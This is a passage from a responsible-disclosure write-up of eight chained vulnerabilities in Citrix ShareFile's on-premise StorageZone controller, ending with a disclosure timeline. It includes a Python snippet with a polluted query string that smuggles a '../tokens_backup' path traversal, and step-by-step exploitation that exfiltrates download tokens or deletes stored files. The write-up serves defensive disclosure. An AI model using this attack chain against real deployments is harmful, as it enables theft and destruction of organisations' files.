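    # The signature only covers the part of the query string before the h parameter
    signed_part = query_string.split('&h=')[0]
    provided = parse_qs(query_string)['h'][0]
    expected = hmac.new(SECRET, signed_part.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, provided)

def get_uploadid(query_string):
    # IIS-style behaviour: duplicate parameters are joined with a comma
    return ','.join(parse_qs(query_string)['uploadid'])

qs = 'uploadid=rsu-becc299a4b9c421ca024dec2b4de7376&h=PLACEHOLDERHMAC&uploadid=../tokens_backup'
# verify() only sees the first uploadid, while the application uses both values:
print(get_uploadid(qs))  # rsu-becc299a4b9c421ca024dec2b4de7376,../tokens_backup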

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attacker’s account this way also recursively deletes all files and folders in the temporary directory. By traversing the path to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.

Conclusion

By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Integrity of token XML files not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick to follow up on the issues and rolled out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown whether they were using the hybrid setup in a vulnerable configuration. Therefore, the number of affected installations, and whether these issues were abused, is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned